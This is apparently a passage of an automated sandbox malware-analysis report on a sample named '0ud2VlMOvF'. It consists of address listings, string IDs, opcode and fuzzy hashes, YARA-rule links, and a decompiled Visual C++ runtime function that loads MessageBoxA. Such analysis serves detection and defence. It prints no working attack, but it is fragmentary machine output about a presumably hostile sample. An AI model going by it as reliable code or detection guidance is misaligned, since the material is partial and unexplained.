                                                                                                                              0x009546c2
                                                                                                                              0x009546d7
                                                                                                                              0x00000000
                                                                                                                              0x009546d7
                                                                                                                              0x009545bb
                                                                                                                              0x00953ef0
                                                                                                                              0x00953ef6
                                                                                                                              0x00954e60
                                                                                                                              0x00954e6b
                                                                                                                              0x00000000
                                                                                                                              0x00954e71
                                                                                                                              0x00953efc
                                                                                                                              0x00953f02
                                                                                                                              0x00000000
                                                                                                                              0x00953f08
                                                                                                                              0x00953f0e
                                                                                                                              0x00000000
                                                                                                                              0x00953f14
                                                                                                                              0x00953f18
                                                                                                                              0x00953f26
                                                                                                                              0x00953f33
                                                                                                                              0x00000000
                                                                                                                              0x00953f39
                                                                                                                              0x00953f33
                                                                                                                              0x00953f0e
                                                                                                                              0x00953f02
                                                                                                                              0x00953ef6
                                                                                                                              0x00953eea
                                                                                                                              0x00953d0e
                                                                                                                              0x00953d14
                                                                                                                              0x009540c8
                                                                                                                              0x009547e7
                                                                                                                              0x009554df
                                                                                                                              0x009554ea
                                                                                                                              0x00000000
                                                                                                                              0x009554f0
                                                                                                                              0x009547ed
                                                                                                                              0x009547f3
                                                                                                                              0x00000000
                                                                                                                              0x009547f9
                                                                                                                              0x009547fe
                                                                                                                              0x00954803
                                                                                                                              0x00954808
                                                                                                                              0x00000000
                                                                                                                              0x00954808
                                                                                                                              0x009547f3
                                                                                                                              0x009540ce
                                                                                                                              0x009540d4
                                                                                                                              0x00955046
                                                                                                                              0x0095504b
                                                                                                                              0x00955058
                                                                                                                              0x00955063
                                                                                                                              0x0095506e
                                                                                                                              0x00955079
                                                                                                                              0x00955084
                                                                                                                              0x0095508f
                                                                                                                              0x00955093
                                                                                                                              0x00000000
                                                                                                                              0x009540da
                                                                                                                              0x009540e0
                                                                                                                              0x00000000
                                                                                                                              0x009540e6
                                                                                                                              0x009540ee
                                                                                                                              0x009540f3
                                                                                                                              0x00000000
                                                                                                                              0x009540f3
                                                                                                                              0x009540e0
                                                                                                                              0x009540d4
                                                                                                                              0x00953d1a
                                                                                                                              0x00953d20
                                                                                                                              0x00954438
                                                                                                                              0x009552a4
                                                                                                                              0x009552ac
                                                                                                                              0x009552bf
                                                                                                                              0x009552c9
                                                                                                                              0x009552f3
                                                                                                                              0x00000000
                                                                                                                              0x0095443e
                                                                                                                              0x00954444
                                                                                                                              0x00000000
                                                                                                                              0x0095444a
                                                                                                                              0x00954451
                                                                                                                              0x0095445d
                                                                                                                              0x0095446a
                                                                                                                              0x00000000
                                                                                                                              0x00954470
                                                                                                                              0x0095446a
                                                                                                                              0x00954444
                                                                                                                              0x00953d26
                                                                                                                              0x00953d2c
                                                                                                                              0x00954b07
                                                                                                                              0x00954b0c
                                                                                                                              0x00954b1c
                                                                                                                              0x00954b2c
                                                                                                                              0x00954b3c
                                                                                                                              0x00954b41
                                                                                                                              0x00954b52
                                                                                                                              0x00954b62
                                                                                                                              0x00954b64
                                                                                                                              0x00000000
                                                                                                                              0x00953d32
                                                                                                                              0x00953d38
                                                                                                                              0x00954b7e
                                                                                                                              0x00954b83
                                                                                                                              0x00954b93
                                                                                                                              0x00954ba3
                                                                                                                              0x00954bb3
                                                                                                                              0x00954bb8
                                                                                                                              0x00954bc9
                                                                                                                              0x00954bd9
                                                                                                                              0x00954bdb
                                                                                                                              0x00000000
                                                                                                                              0x00953d3e
                                                                                                                              0x00953d44
                                                                                                                              0x00000000
                                                                                                                              0x00953d4a
                                                                                                                              0x00953d58
                                                                                                                              0x00953d5f
                                                                                                                              0x00000000
                                                                                                                              0x00953d5f
                                                                                                                              0x00953d44
                                                                                                                              0x00953d38
                                                                                                                              0x00953d2c
                                                                                                                              0x00953d20
                                                                                                                              0x00953d14
                                                                                                                              0x00953b4c
                                                                                                                              0x00953b52
                                                                                                                              0x00953dc1
                                                                                                                              0x0095415a
                                                                                                                              0x0095489d
                                                                                                                              0x00955575
                                                                                                                              0x00955578
                                                                                                                              0x0095557d
                                                                                                                              0x00955583
                                                                                                                              0x00955598
                                                                                                                              0x009555a8
                                                                                                                              0x009555b8
                                                                                                                              0x009555ca
                                                                                                                              0x009555db
                                                                                                                              0x009555dd
                                                                                                                              0x009555e4
                                                                                                                              0x0095570b
                                                                                                                              0x0095570b
                                                                                                                              0x0095570d
                                                                                                                              0x00000000
                                                                                                                              0x009548a3
                                                                                                                              0x009548a9
                                                                                                                              0x00000000
                                                                                                                              0x009548af
                                                                                                                              0x009548ba
                                                                                                                              0x009548d8
                                                                                                                              0x00000000
                                                                                                                              0x009548d8
                                                                                                                              0x009548a9
                                                                                                                              0x00954160
                                                                                                                              0x00954166
                                                                                                                              0x00955104
                                                                                                                              0x00955108
                                                                                                                              0x00955114
                                                                                                                              0x00955118
                                                                                                                              0x00955121
                                                                                                                              0x0095512c
                                                                                                                              0x00955139
                                                                                                                              0x00955144
                                                                                                                              0x0095514f
                                                                                                                              0x00955157
                                                                                                                              0x00955162
                                                                                                                              0x0095516c
                                                                                                                              0x00000000
                                                                                                                              0x00955172
                                                                                                                              0x0095416c
                                                                                                                              0x00954172
                                                                                                                              0x00000000
                                                                                                                              0x00954178
                                                                                                                              0x00954186
                                                                                                                              0x0095418d
                                                                                                                              0x00000000
                                                                                                                              0x0095418d
                                                                                                                              0x00954172
                                                                                                                              0x00954166
                                                                                                                              0x00953dc7
                                                                                                                              0x00953dcd
                                                                                                                              0x009544d0
                                                                                                                              0x00955355
                                                                                                                              0x0095535c
                                                                                                                              0x00000000
                                                                                                                              0x009544d6
                                                                                                                              0x009544dc
                                                                                                                              0x00000000
                                                                                                                              0x009544e2
                                                                                                                              0x009544e6
                                                                                                                              0x009544eb
                                                                                                                              0x009544f0
                                                                                                                              0x009544f5
                                                                                                                              0x00954505
                                                                                                                              0x00954521
                                                                                                                              0x00000000
                                                                                                                              0x00954521
                                                                                                                              0x009544dc
                                                                                                                              0x00953dd3
                                                                                                                              0x00953dd9
                                                                                                                              0x00954ce9
                                                                                                                              0x00954d06
                                                                                                                              0x00000000
                                                                                                                              0x00953ddf
                                                                                                                              0x00953de5
                                                                                                                              0x00954d14
                                                                                                                              0x00954d19
                                                                                                                              0x00954d27
                                                                                                                              0x00954d32
                                                                                                                              0x00954d39
                                                                                                                              0x00000000
                                                                                                                              0x00953deb
                                                                                                                              0x00953df1
                                                                                                                              0x00000000
                                                                                                                              0x00953df7
                                                                                                                              0x00953dfe
                                                                                                                              0x00953e09
                                                                                                                              0x00000000
                                                                                                                              0x00953e0f
                                                                                                                              0x00953e09
                                                                                                                              0x00953df1
                                                                                                                              0x00953de5
                                                                                                                              0x00953dd9
                                                                                                                              0x00953dcd
                                                                                                                              0x00953b58
                                                                                                                              0x00953b5e
                                                                                                                              0x00953fae
                                                                                                                              0x00954718
                                                                                                                              0x00955464
                                                                                                                              0x0095546e
                                                                                                                              0x0095547c
                                                                                                                              0x0095548a
                                                                                                                              0x00955497
                                                                                                                              0x00000000
                                                                                                                              0x0095549d
                                                                                                                              0x0095471e
                                                                                                                              0x00954724
                                                                                                                              0x00000000
                                                                                                                              0x0095472a
                                                                                                                              0x00954731
                                                                                                                              0x00954736
                                                                                                                              0x00954744
                                                                                                                              0x00954752
                                                                                                                              0x00954760
                                                                                                                              0x00954771
                                                                                                                              0x00954782
                                                                                                                              0x00000000
                                                                                                                              0x00954782
                                                                                                                              0x00954724
                                                                                                                              0x00953fb4
                                                                                                                              0x00953fba
                                                                                                                              0x00954f4a
                                                                                                                              0x00954f4f
                                                                                                                              0x00000000
                                                                                                                              0x00953fc0
                                                                                                                              0x00953fc6
                                                                                                                              0x00954f8e
                                                                                                                              0x00954f95
                                                                                                                              0x00954fa2
                                                                                                                              0x00954fa5
                                                                                                                              0x00954fb2
                                                                                                                              0x00000000
                                                                                                                              0x00954fb8
                                                                                                                              0x00953fcc
                                                                                                                              0x00953fd2
                                                                                                                              0x00000000
                                                                                                                              0x00953fd8
                                                                                                                              0x00953ffc
                                                                                                                              0x00954009
                                                                                                                              0x0095401c
                                                                                                                              0x0095401f
                                                                                                                              0x0095402d
                                                                                                                              0x0095403b
                                                                                                                              0x00954042
                                                                                                                              0x00954050
                                                                                                                              0x0095405d
                                                                                                                              0x00000000
                                                                                                                              0x00954063
                                                                                                                              0x0095405d
                                                                                                                              0x00953fd2
                                                                                                                              0x00953fc6
                                                                                                                              0x00953fba
                                                                                                                              0x00953b64
                                                                                                                              0x00953b6a
                                                                                                                              0x0095433d
                                                                                                                              0x0095525b
                                                                                                                              0x0095525f
                                                                                                                              0x0095526a
                                                                                                                              0x00955271
                                                                                                                              0x00955278
                                                                                                                              0x0095527f
                                                                                                                              0x0095528c
                                                                                                                              0x00000000
                                                                                                                              0x00954343
                                                                                                                              0x00954349
                                                                                                                              0x00000000
                                                                                                                              0x0095434f
                                                                                                                              0x0095435d
                                                                                                                              0x00954376
                                                                                                                              0x00954389
                                                                                                                              0x009543a0
                                                                                                                              0x009543b2
                                                                                                                              0x009543b9
                                                                                                                              0x009543c6
                                                                                                                              0x009543cf
                                                                                                                              0x009543dc
                                                                                                                              0x009543ea
                                                                                                                              0x009543f1
                                                                                                                              0x00000000
                                                                                                                              0x009543f1
                                                                                                                              0x00954349
                                                                                                                              0x00953b70
                                                                                                                              0x00953b76
                                                                                                                              0x00954a0d
                                                                                                                              0x00954a1b
                                                                                                                              0x00954a28
                                                                                                                              0x00000000
                                                                                                                              0x00954a2e
                                                                                                                              0x00953b7c
                                                                                                                              0x00953b82
                                                                                                                              0x00954a3a
                                                                                                                              0x00954a42
                                                                                                                              0x00954a52
                                                                                                                              0x00954a60
                                                                                                                              0x00954a6e
                                                                                                                              0x00954a7c
                                                                                                                              0x00954a8a
                                                                                                                              0x00954a98
                                                                                                                              0x00954aa5
                                                                                                                              0x00000000
                                                                                                                              0x00954aab
                                                                                                                              0x00953b88
                                                                                                                              0x00953b8e
                                                                                                                              0x00000000
                                                                                                                              0x00953b94
                                                                                                                              0x00953b9b
                                                                                                                              0x00953ba0
                                                                                                                              0x00953bae
                                                                                                                              0x00953bbc
                                                                                                                              0x00953bca
                                                                                                                              0x00953bd8
                                                                                                                              0x00953bf0
                                                                                                                              0x00953bfd
                                                                                                                              0x00000000
                                                                                                                              0x00953c03
                                                                                                                              0x00953bfd
                                                                                                                              0x00953b8e
                                                                                                                              0x00953b82
                                                                                                                              0x00953b76
                                                                                                                              0x00953b6a
                                                                                                                              0x00953b5e
                                                                                                                              0x00953b52
                                                                                                                              0x00000000
                                                                                                                              0x00953b46
                                                                                                                              0x00953adc
                                                                                                                              0x00953adc
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 08'g$18'g$18'g$7X/N$7X/N$8N[z$9N[z$9N[z$C.T}$C.T}$C.T}$C.T}$C9as$C9as$C9as$invalid distance code$invalid literal/length code${Y[${Y[${Y[${Y[
                                                                                                                              • API String ID: 0-3141061775
                                                                                                                              • Opcode ID: 4948fdc0da5365952e41bc46ac34d358754939c37fc1e3fce3ac006cac590fd4
                                                                                                                              • Instruction ID: bb3c75cfe06d831cb1d3767ebf46ecc30cf3897455c0abefacaed246f3cc71a5
                                                                                                                              • Opcode Fuzzy Hash: 4948fdc0da5365952e41bc46ac34d358754939c37fc1e3fce3ac006cac590fd4
                                                                                                                              • Instruction Fuzzy Hash: 2853447A6093858FC774CF19C194AAEB7E6EFC9311F52892EE88D87350D734A944CB42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0095FC50 Relevance: 21.7, Strings: 17, Instructions: 431COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0iI$0iI$0iI$0iI$0iI$0iI$0iI$0iI$0iI$0iI$0iI$0iI$1iI$1iI$1iI$PaX*$PaX*
                                                                                                                              • API String ID: 0-2918843821
                                                                                                                              • Opcode ID: ab25fe46cea283c12e3e99a2f381000c1c4cbc631f9cbd0afbbf708f6163592e
                                                                                                                              • Instruction ID: 389df1b37cf9a8b8cd250efda841de4aad9093ea26dd2859bd2850acee2a0bb1
                                                                                                                              • Opcode Fuzzy Hash: ab25fe46cea283c12e3e99a2f381000c1c4cbc631f9cbd0afbbf708f6163592e
                                                                                                                              • Instruction Fuzzy Hash: E4E12B7FA256144F8710CB1A9C8015EFAD39BCC335B6FC665DCA8973A9CA7C9C064781
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0042A89D Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 164libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 47%
                                                                                                                              			E0042A89D(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				signed char _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr* _t31;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr _t36;
				intOrPtr* _t37;
				void* _t41;
				void* _t43;
				intOrPtr _t48;
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t56;
				intOrPtr _t61;
				void* _t67;
				void* _t71;
				void* _t74;
				intOrPtr* _t75;
				struct HINSTANCE__* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr _t81;
				void* _t88;

				_t74 = __edx;
				_t28 = E00420027();
				_t81 =  *0x43cb10; // 0x0
				_v12 = _t28;
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				if(_t81 != 0) {
					L8:
					_t29 =  *0x43cb1c; // 0x0
					_t61 = _v12;
					if(_t29 == _t61) {
						L20:
						_t30 =  *0x43cb14; // 0x0
						__eflags = _t30 - _v12;
						if(_t30 != _v12) {
							_t34 = E00420030(_t30);
							__eflags = _t34;
							if(_t34 != 0) {
								_t35 =  *_t34();
								__eflags = _t35;
								_v8 = _t35;
								if(_t35 != 0) {
									_t36 =  *0x43cb18; // 0x0
									__eflags = _t36 - _v12;
									if(_t36 != _v12) {
										_t37 = E00420030(_t36);
										__eflags = _t37;
										if(_t37 != 0) {
											_v8 =  *_t37(_v8);
										}
									}
								}
							}
						}
						L26:
						_t31 = E00420030( *0x43cb10);
						if(_t31 == 0) {
							L28:
							__eflags = 0;
							return 0;
						}
						return  *_t31(_v8, _a4, _a8, _a12);
					}
					_t88 =  *0x43cb20 - _t61; // 0x0
					if(_t88 == 0) {
						goto L20;
					}
					_t77 = E00420030(_t29);
					_t75 = E00420030( *0x43cb20);
					if(_t77 == 0 || _t75 == 0) {
						goto L20;
					} else {
						_t41 =  *_t77();
						if(_t41 == 0) {
							L15:
							_t43 = E00421057(0, _t74, _t75,  &_v20);
							_t94 = _t43;
							_pop(_t67);
							if(_t43 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0041AC13(0, _t67, _t74, _t75, _t94);
							}
							if(_v20 < 4) {
								_a12 = _a12 | 0x00040000;
							} else {
								_a12 = _a12 | 0x00200000;
							}
							goto L26;
						}
						_push( &_v24);
						_push(0xc);
						_push( &_v36);
						_push(1);
						_push(_t41);
						if( *_t75() == 0 || (_v28 & 0x00000001) == 0) {
							goto L15;
						} else {
							goto L20;
						}
					}
				}
				_t76 = LoadLibraryA("USER32.DLL");
				if(_t76 == 0 || GetProcAddress(_t76, "MessageBoxA") == 0) {
					goto L28;
				} else {
					_t48 = E0041FFB9(_t47);
					 *_t79 = "GetActiveWindow";
					 *0x43cb10 = _t48;
					_t50 = E0041FFB9(GetProcAddress(??, ??));
					 *_t79 = "GetLastActivePopup";
					 *0x43cb14 = _t50;
					 *0x43cb18 = E0041FFB9(GetProcAddress(_t76, _t76));
					_t54 = E00421020(0, _t74, _t76,  &_v16);
					_t84 = _t54;
					_pop(_t71);
					if(_t54 != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0041AC13(0, _t71, _t74, _t76, _t84);
						_t79 = _t79 + 0x14;
					}
					if(_v16 == 2) {
						_t56 = E0041FFB9(GetProcAddress(_t76, "GetUserObjectInformationA"));
						 *0x43cb20 = _t56;
						if(_t56 != 0) {
							 *0x43cb1c = E0041FFB9(GetProcAddress(_t76, "GetProcessWindowStation"));
						}
					}
					goto L8;
				}
			}




































                                                                                                                              0x0042a89d
                                                                                                                              0x0042a8a6
                                                                                                                              0x0042a8ad
                                                                                                                              0x0042a8b3
                                                                                                                              0x0042a8b6
                                                                                                                              0x0042a8b9
                                                                                                                              0x0042a8bc
                                                                                                                              0x0042a8bf
                                                                                                                              0x0042a973
                                                                                                                              0x0042a973
                                                                                                                              0x0042a978
                                                                                                                              0x0042a97d
                                                                                                                              0x0042a9f8
                                                                                                                              0x0042a9f8
                                                                                                                              0x0042a9fd
                                                                                                                              0x0042aa00
                                                                                                                              0x0042aa03
                                                                                                                              0x0042aa08
                                                                                                                              0x0042aa0b
                                                                                                                              0x0042aa0d
                                                                                                                              0x0042aa0f
                                                                                                                              0x0042aa11
                                                                                                                              0x0042aa14
                                                                                                                              0x0042aa16
                                                                                                                              0x0042aa1b
                                                                                                                              0x0042aa1e
                                                                                                                              0x0042aa21
                                                                                                                              0x0042aa26
                                                                                                                              0x0042aa29
                                                                                                                              0x0042aa30
                                                                                                                              0x0042aa30
                                                                                                                              0x0042aa29
                                                                                                                              0x0042aa1e
                                                                                                                              0x0042aa14
                                                                                                                              0x0042aa0b
                                                                                                                              0x0042aa33
                                                                                                                              0x0042aa39
                                                                                                                              0x0042aa41
                                                                                                                              0x0042aa53
                                                                                                                              0x0042aa53
                                                                                                                              0x00000000
                                                                                                                              0x0042aa53
                                                                                                                              0x00000000
                                                                                                                              0x0042aa4f
                                                                                                                              0x0042a97f
                                                                                                                              0x0042a985
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042a993
                                                                                                                              0x0042a99e
                                                                                                                              0x0042a9a0
                                                                                                                              0x00000000
                                                                                                                              0x0042a9a6
                                                                                                                              0x0042a9a6
                                                                                                                              0x0042a9aa
                                                                                                                              0x0042a9c5
                                                                                                                              0x0042a9c9
                                                                                                                              0x0042a9ce
                                                                                                                              0x0042a9d0
                                                                                                                              0x0042a9d1
                                                                                                                              0x0042a9d3
                                                                                                                              0x0042a9d4
                                                                                                                              0x0042a9d5
                                                                                                                              0x0042a9d6
                                                                                                                              0x0042a9d7
                                                                                                                              0x0042a9d8
                                                                                                                              0x0042a9dd
                                                                                                                              0x0042a9e4
                                                                                                                              0x0042a9ef
                                                                                                                              0x0042a9e6
                                                                                                                              0x0042a9e6
                                                                                                                              0x0042a9e6
                                                                                                                              0x00000000
                                                                                                                              0x0042a9e4
                                                                                                                              0x0042a9af
                                                                                                                              0x0042a9b0
                                                                                                                              0x0042a9b5
                                                                                                                              0x0042a9b6
                                                                                                                              0x0042a9b8
                                                                                                                              0x0042a9bd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042a9bd
                                                                                                                              0x0042a9a0
                                                                                                                              0x0042a8d0
                                                                                                                              0x0042a8d4
                                                                                                                              0x00000000
                                                                                                                              0x0042a8f0
                                                                                                                              0x0042a8f1
                                                                                                                              0x0042a8f6
                                                                                                                              0x0042a8fe
                                                                                                                              0x0042a906
                                                                                                                              0x0042a90b
                                                                                                                              0x0042a913
                                                                                                                              0x0042a920
                                                                                                                              0x0042a929
                                                                                                                              0x0042a92e
                                                                                                                              0x0042a931
                                                                                                                              0x0042a932
                                                                                                                              0x0042a934
                                                                                                                              0x0042a935
                                                                                                                              0x0042a936
                                                                                                                              0x0042a937
                                                                                                                              0x0042a938
                                                                                                                              0x0042a939
                                                                                                                              0x0042a93e
                                                                                                                              0x0042a93e
                                                                                                                              0x0042a945
                                                                                                                              0x0042a950
                                                                                                                              0x0042a958
                                                                                                                              0x0042a95d
                                                                                                                              0x0042a96e
                                                                                                                              0x0042a96e
                                                                                                                              0x0042a95d
                                                                                                                              0x00000000
                                                                                                                              0x0042a945

                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0043C520,0042208A,0043C520,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A8CA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0042A8E6
                                                                                                                                • Part of subcall function 0041FFB9: TlsGetValue.KERNEL32(00429033,004290B3,00429033,00000014,00424061,00000000,00000FA0,00439018,0000000C,004240C0,0041AD79,?,?,00425EA3,00000004,00439078), ref: 0041FFC6
                                                                                                                                • Part of subcall function 0041FFB9: TlsGetValue.KERNEL32(00000006,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 0041FFDD
                                                                                                                                • Part of subcall function 0041FFB9: RtlEncodePointer.NTDLL(0041AD79,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 0042001B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0042A903
                                                                                                                                • Part of subcall function 0041FFB9: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 0041FFF2
                                                                                                                                • Part of subcall function 0041FFB9: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0042000D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0042A918
                                                                                                                              • __invoke_watson.LIBCMT ref: 0042A939
                                                                                                                                • Part of subcall function 0041AC13: _memset.LIBCMT ref: 0041AC9F
                                                                                                                                • Part of subcall function 0041AC13: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 0041ACBD
                                                                                                                                • Part of subcall function 0041AC13: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 0041ACC7
                                                                                                                                • Part of subcall function 0041AC13: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0041ACD1
                                                                                                                                • Part of subcall function 0041AC13: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 0041ACEC
                                                                                                                                • Part of subcall function 0041AC13: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 0041ACF3
                                                                                                                                • Part of subcall function 00420030: TlsGetValue.KERNEL32(?,0042051E,0041CAAE,0041AD79,?,0041AD79,004011F3,?,004011F3,?), ref: 0042003D
                                                                                                                                • Part of subcall function 00420030: TlsGetValue.KERNEL32(00000006,?,0041AD79,004011F3,?,004011F3,?), ref: 00420054
                                                                                                                                • Part of subcall function 00420030: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041AD79,004011F3,?,004011F3,?), ref: 00420069
                                                                                                                                • Part of subcall function 00420030: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00420084
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0042A94D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042A965
                                                                                                                              • __invoke_watson.LIBCMT ref: 0042A9D8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerEncodeLibraryLoadPointerPresentTerminate_memset
                                                                                                                              • String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                              • API String ID: 1761029719-1046234306
                                                                                                                              • Opcode ID: 9899260cb70d71afe69c94cdc83698175a2dcafe13db075685a7a359dd2baa15
                                                                                                                              • Instruction ID: d273b01acf2477c9a927efce1976babcc57eb5c731b5436298dd595ca22ee8a4
                                                                                                                              • Opcode Fuzzy Hash: 9899260cb70d71afe69c94cdc83698175a2dcafe13db075685a7a359dd2baa15
                                                                                                                              • Instruction Fuzzy Hash: 2A4197B1E04225ABDF10AFB2BC86A5FB7A4AF04344B50087FE410E2251DB7C9591CB6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0095E1A0 Relevance: 20.0, Strings: 15, Instructions: 1273COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: -X-e$-X-e$1XZG$1XZG$7x%$7x%$]g+P$]g+P$]g+P$qq>~$qq>~$qq>~$}*)$}*)$}*)
                                                                                                                              • API String ID: 0-525131128
                                                                                                                              • Opcode ID: ac64f756aee302fcbf1818f709c3b77cf6f02e521fb1f0c0262891cc1c27357a
                                                                                                                              • Instruction ID: dfb740ed75305a576b3c446ac73fffe98dd8c210683812ceeb906dc726b03208
                                                                                                                              • Opcode Fuzzy Hash: ac64f756aee302fcbf1818f709c3b77cf6f02e521fb1f0c0262891cc1c27357a
                                                                                                                              • Instruction Fuzzy Hash: 47C26734608381CFD778CF29C1A4BAEB7E1AF99311F20492EE99E87750D73599498B43
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00969270 Relevance: 20.0, Strings: 15, Instructions: 1218COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: _tUd$_tUd$hVW{$hVW{$hVW{$l:A=$l:A=$n"{$n"{$p.9l$q.9l$q.9l$`X$`X$`X
                                                                                                                              • API String ID: 0-326276725
                                                                                                                              • Opcode ID: 46baf264c63e7048172f6e670604e33b72c3c42273fd651a3d1869b6056508d2
                                                                                                                              • Instruction ID: 4150f6a431661e78f0d4266d8ddc6af5b64c7d7541dca70d67231a4ae5f305f1
                                                                                                                              • Opcode Fuzzy Hash: 46baf264c63e7048172f6e670604e33b72c3c42273fd651a3d1869b6056508d2
                                                                                                                              • Instruction Fuzzy Hash: C5B25C74208381DFDB38CF18C4A47AAB7E5AF99304F20491EE9AADB760D6759C44DB43
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009614C0 Relevance: 17.5, Strings: 13, Instructions: 1235COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$oYP$oYP$unknown compression method$vN$wN$wN$c$c$c
                                                                                                                              • API String ID: 0-767431075
                                                                                                                              • Opcode ID: 9f753f95a7649f5de9c75c7cc990ce7215121436cfd4083150599752050c9ef3
                                                                                                                              • Instruction ID: b9fab4e3f66f6337dec03124a5f7b991cb4bc68793bda83ed13ab2d7c7e5e06e
                                                                                                                              • Opcode Fuzzy Hash: 9f753f95a7649f5de9c75c7cc990ce7215121436cfd4083150599752050c9ef3
                                                                                                                              • Instruction Fuzzy Hash: 5AB24D796087818FC728CF18C494A2AB7F5BB8A350F244D5EE59ACB3A0D775DC84DB42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402FB0 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 576networkCOMMONCrypto
                                                                                                                              Download Yara Rule
